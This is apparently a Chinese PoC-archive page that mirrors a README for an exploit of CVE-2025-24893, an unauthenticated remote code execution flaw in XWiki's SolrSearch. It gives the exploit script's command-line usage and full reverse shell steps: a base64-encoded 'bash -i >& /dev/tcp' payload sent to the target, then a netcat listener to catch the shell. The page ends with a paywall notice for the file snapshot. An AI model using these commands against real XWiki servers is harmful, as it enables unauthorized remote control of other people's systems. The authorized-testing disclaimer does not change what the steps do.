目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CVE-2025-24893 PoC — XWiki Platform 安全漏洞

来源
关联漏洞
标题: XWiki Platform 安全漏洞 (CVE-2025-24893)
Description:XWiki Platform是XWiki开源的一套用于创建Web协作应用程序的Wiki平台。 XWiki Platform存在安全漏洞,该漏洞源于任何来宾用户都可以通过对SolrSearch的请求,造成远程代码执行。
介绍
# CVE-2025-24893 - XWiki Remote Code Execution (RCE)

An updated proof-of-concept (PoC) exploit for **CVE-2025-24893**, a critical unauthenticated RCE vulnerability in [XWiki](https://xwiki.org/). This version improves on the original by allowing arbitrary shell command execution and clean reverse shell injection.

> By: [HexHunter404](https://github.com/dhiaZnaidi)

---

## ⚠️ Warning

This code is provided for **educational and authorized penetration testing purposes only**.  
**Do not use it on systems you do not own or have explicit permission to test.**

---

## ✨ Features

- Supports command execution via `bash -c '<command>'`
- Fully supports reverse shells (via base64 to bypass Groovy issues)
- Improved handling of command output
- Preserves `/xwiki` path and avoids redirect loops

---

## 🐍 Usage

```
python3 CVE-2025-24893-PoC.py -u http://<target>/xwiki -c "<command>"
```

---

## 🐚 Getting a Reverse Shell
. Base64-encode your reverse shell

```
echo "bash -i >& /dev/tcp/[IP]/4444 0>&1" | base64
```

. Send it using the PoC

```
python3  CVE-2025-24893-PoC.py -u [URL] -c "echo [Base64 Payload] | base64 -d | bash"
```

. Set up your listener

```
nc -lvnp 4444
```

If successful, you'll catch a shell


文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →